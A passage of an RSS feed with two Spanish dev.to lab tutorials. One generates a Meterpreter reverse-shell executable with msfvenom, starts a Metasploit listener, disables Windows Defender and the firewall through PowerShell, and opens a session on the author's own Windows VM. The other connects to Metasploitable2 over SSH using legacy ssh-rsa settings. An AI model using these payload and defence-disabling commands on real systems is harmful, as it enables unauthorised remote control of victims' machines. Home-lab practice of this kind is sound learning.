&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F98w6hujyqfhiv1yumyvl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F98w6hujyqfhiv1yumyvl.png" alt=" " width="623" height="94"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[*] Connected to msf. Connection type: postgresql.
[msf](Jobs:0 Agents:0) &amp;gt;&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nos colocamos en la carpeta que vamos a compartir con Samba dentro de la consola de msfconsole para crear el ejecutable (payload). En este caso, para que no haya dudas se llamará virusaco.exe, y lo crearemos en Desktop.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd /home/misterk/Desktop
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiofbm5t1wyjn1owb4f3k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fiofbm5t1wyjn1owb4f3k.png" alt=" " width="347" height="69"&gt;&lt;/a&gt;&lt;br&gt;
Genero el &lt;strong&gt;payload&lt;/strong&gt; que enviaré a Windows.&lt;/p&gt;

&lt;p&gt;IMPORTANTE: La ip que meto en el siguiente comando es la de kali, nuestra maquina atacante.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;msfvenom -p windows/meterpreter/reverse_tcp --platform windows --arch x86 -f exe LHOST="192.168.1.140" LPORT=4444 -o virusaco.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Si el puerto nos dá problemas, cambiamos de puerto y listo.&lt;br&gt;
Nos dará un dialogo como el siguiente la consola&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[*] exec: msfvenom -p windows/meterpreter/reverse_tcp --platform windows --arch x86 -f exe LHOST="192.168.1.140" LPORT=4444 -o virusaco.exe

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: virusaco.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnclibtmumfp6dvup0j1m.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnclibtmumfp6dvup0j1m.png" alt=" " width="800" height="91"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ejecutamos las siguientes lineas una a una para configurar el listener, o archivo que estará a la escucha del payload que se ejecutará en Windows.&lt;br&gt;
A cada linea que se genera en la terminal añado la mia.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;use multi/handler
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;multi/handler&lt;/strong&gt; en Metasploit se utiliza para configurar un "manejador" que espera conexiones entrantes desde una máquina comprometida. Esencialmente, es como preparar un punto de encuentro para recibir una conexión remota desde un exploit exitoso.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;¿Para qué sirve?&lt;/strong&gt;&lt;br&gt;
Recibir conexiones: Cuando ejecutas un exploit que abre una puerta trasera (por ejemplo, un payload como Meterpreter), el manejador espera a que la máquina objetivo se conecte a ti.&lt;br&gt;
Interactuar con la víctima: Una vez establecida la conexión, puedes controlar la máquina remota, ejecutar comandos, extraer datos, etc.&lt;/p&gt;

&lt;p&gt;Ahora vamos con el reverse_tcp:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;set payload generic/shell_reverse_tcp

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;set payload windows/meterpreter/reverse_tcp
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Este comando básicamente hace lo siguiente:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;set payload generic/shell_reverse_tcp&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Configuro el payload para crear una shell inversa genérica. Esto significa que, si la explotación tiene éxito, se establecerá una conexión inversa desde el objetivo hacia tu máquina, permitiéndote ejecutar comandos en el sistema comprometido.&lt;/p&gt;

&lt;p&gt;set payload windows/meterpreter/reverse_tcp&lt;/p&gt;

&lt;p&gt;Cambio el payload a &lt;strong&gt;Meterpreter&lt;/strong&gt;, que es una carga útil más avanzada y flexible. &lt;strong&gt;Meterpreter **proporciona un entorno interactivo con muchas funcionalidades adicionales, como la manipulación de archivos, la extracción de credenciales y más. Este payload también establece una conexión inversa TCP, pero con las ventajas adicionales de **Meterpreter&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkcmdh2pabzbid54b4coe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkcmdh2pabzbid54b4coe.png" alt=" " width="800" height="69"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Configuro el localhost&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;set lhost 192.168.1.156
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;El puerto por el que mandará la escucha:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;set lport 4444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Y ejecuto el programa del listener y la terminal se queda a la escucha de que se ejecute.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;exploit
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg1f6q5kttd3a90rjk9bo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg1f6q5kttd3a90rjk9bo.png" alt=" " width="725" height="133"&gt;&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[*] Started reverse TCP handler on 192.168.1.156:4444 
[*] Sending stage (177734 bytes) to 192.168.1.156
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/recog-3.1.17/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Desactivo Windows Defender y el firewall de windows para poder hacer la práctica sin problemas de eliminación del programa ejecutable.&lt;/p&gt;

&lt;p&gt;Para no andar con el lio que supone ir haciendo uno por uno el desactivar Windows Defender y su Firewall. Lo desactivo a traves del powershell en modo Administrador (boton derecho sobre su ejecutable) y ejecutando las siguientes lineas.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning $true
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4hyfqymtmksnjlo6rx5r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4hyfqymtmksnjlo6rx5r.png" alt=" " width="786" height="198"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;NOTA IMPORTANTE:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Volver a que Windows Defender vuelva a funcionar junto al Firewall, lo haremos con las siguientes lineas o simplemente arrancando de cero windows lo deja como estaba. Pero ahora mismo no habremos de hacerlo a fin de no tener problemas descargando el ejecutable desde Samba.&lt;/p&gt;

&lt;p&gt;Lo haremos al final del tutorial. NOTA AL FINAL DEL LABORATORIO.&lt;/p&gt;

&lt;p&gt;Abro el explorardor de archivos y escribo en la barra de direcciones&lt;br&gt;
 &lt;strong&gt;"\\192.168.1.140\misterk\Desktop"&lt;/strong&gt; y me abre la carpeta compartida a traves del servidor samba en kali linux. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fewpt6tifny2u1654f6c7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fewpt6tifny2u1654f6c7.png" alt=" " width="800" height="567"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Descargo el archivo "virusaco.exe" a Windows y lo ejecuto. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0bja1ep3jmvj5unp4epw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0bja1ep3jmvj5unp4epw.png" alt=" " width="611" height="578"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Y me sale lo siguiente en mi terminal de kali. &lt;/p&gt;

&lt;p&gt;[*] Meterpreter session 1 opened (192.168.1.140:4444 -&amp;gt; 192.168.1.156:65111) at 2025-08-30 03:06:22 +0200&lt;/p&gt;

&lt;p&gt;Ya puedo ejecutar comandos en Windows a traves de mi terminal de Linux.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;(Meterpreter 1)(C:\Users\misterk\Desktop) &amp;gt; ls

Listing: C:\Users\misterk\Desktop
=================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  2354   fil   2025-08-29 16:37:43 +0200  Microsoft Edge.lnk
100666/rw-rw-rw-  282    fil   2025-08-29 16:37:42 +0200  desktop.ini
100777/rwxrwxrwx  73802  fil   2025-08-30 03:03:49 +0200  virusaco.exe

(Meterpreter 1)(C:\Users\misterk\Desktop) &amp;gt; 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Y ya estoy dentro de windows.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5195h1naomryog5p8ryz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5195h1naomryog5p8ryz.png" alt=" " width="800" height="353"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Para activar la seguridad en windows reiniciamos el equipo o ejecutamos esto en modo administrador desde la Powershell.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Set-MpPreference -DisableRealtimeMonitoring $false
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



</description>
    </item>
    <item>
      <title>Conectar via ssh con Metasploitable 2</title>
      <dc:creator>mister_keto</dc:creator>
      <pubDate>Fri, 29 Aug 2025 00:34:05 +0000</pubDate>
      <link>https://dev.to/mister_keto/conectar-via-ssh-con-metasploitable-2-3i80</link>
      <guid>https://dev.to/mister_keto/conectar-via-ssh-con-metasploitable-2-3i80</guid>
      <description>&lt;p&gt;Aunque parece sencillo conectar vía SSH con este magnífico laboratorio de sabiduría, no es fácil. Tras mucha pelea he conseguido la manera de conectarme y al mismo tiempo crear un alias en mi terminal de linux para acceder de forma más rápida a ese host.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Metasploitable2&lt;/strong&gt; usa un servidor &lt;strong&gt;SSH&lt;/strong&gt; muy viejo, que solo ofrece algoritmos obsoletos (&lt;strong&gt;ssh-rsa con SHA-1 y ssh-dss&lt;/strong&gt;). Las versiones modernas de OpenSSH (las que tienes en Kali, Ubuntu, Parrot, etc.) los deshabilitan por defecto, por eso falla.&lt;/p&gt;

&lt;p&gt;sí intentamos un:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ssh msfadmin@192.168.1.155
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;nos tira el siguiente error&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Unable to negotiate with 192.168.1.155 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Con el siguiente comando forzamos a tu cliente SSH a aceptar claves débiles antiguas (ssh-rsa) que el servidor Metasploitable2 todavía usa, para que la conexión no falle por “&lt;em&gt;no matching host key type&lt;/em&gt;”.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa msfadmin@192.168.1.155
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;En pocas palabras, le decimos lo siguiente:&lt;/p&gt;

&lt;p&gt;Oye SSH, ignora las restricciones modernas y conéctate a este servidor antiguo usando claves ssh-rsa.&lt;/p&gt;

&lt;h2&gt;
  
  
  CREAR UN ALIAS EN NUESTRO LINUX PARA CONECTAR MAS FACILMENTE
&lt;/h2&gt;

&lt;p&gt;Ahora viene la segunda parte del ejercicio crear un alias en nuestro archivo de configuración de ssh. Para que las próximas veces solo tengamos que poner la contraseña para conectarnos a &lt;strong&gt;metasploitable&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;creamos el archivo de configuración de ssh en la siguiente ruta si no existiera&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo nano ~/.ssh/config
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Si no estamos como Super usuario o sudo le damos la contraseña y dentro del archivo pegamos lo siguiente:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Host metasploitable
    HostName 192.168.1.155   # IP actual de la VM
    User msfadmin
    HostKeyAlgorithms +ssh-rsa
    PubkeyAcceptedAlgorithms +ssh-rsa
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;con esto conseguimos evitarnos volver a escribir todos los comandos anteriores y con un simple...&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ssh metasploitable
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;entraremos vía ssh a tan magnifico laboratorio a trastear.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
